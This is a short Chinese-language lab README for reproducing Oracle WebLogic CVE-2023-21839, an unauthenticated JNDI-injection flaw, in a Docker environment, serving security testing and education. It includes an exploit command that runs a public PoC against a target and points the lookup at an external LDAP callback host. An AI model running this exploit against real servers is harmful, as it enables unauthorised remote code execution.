# WebLogic未授权远程代码执行漏洞 (CVE-2023-21839) Oracle WebLogic Server是业界广泛使用的Java EE企业级应用服务器。 在[Oracle 2023年1月安全公告](https://www.oracle.com/security-alerts/cpujan2023.html)中,Oracle修复了影响WebLogic Server 12.2.1.3.0、12.2.1.4.0和14.1.1.0.0版本的严重安全漏洞CVE-2023-21839。 该漏洞允许未授权远程攻击者通过T3或IIOP协议发起JNDI lookup操作。如果JDK版本过低或本地存在可用的反序列化gadget(javaSerializedData),攻击者可进一步实现远程代码执行(RCE)。 参考链接: - - - ## 环境设置 执行以下命令启动WebLogic Server 12.2.1.3漏洞环境: ``` docker compose up -d ``` 启动完成后,访问`http://your-ip:7001/console`可以看到WebLogic管理控制台登录页。 ## 漏洞复现 你可以使用公开的POC工具进行漏洞复现。 ```shell python CVE-2023-21839.py -ip 192.168.25.129 -p 7001 -l ldap://craft.ldap.tld/test ``` 漏洞利用成功后,可在DNSLog平台或LDAP服务端看到来自目标服务器的请求,如下图所示: ![](1.png)